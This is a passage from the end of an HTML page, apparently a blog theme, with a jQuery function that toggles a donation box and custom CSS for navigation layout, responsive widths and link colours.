    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
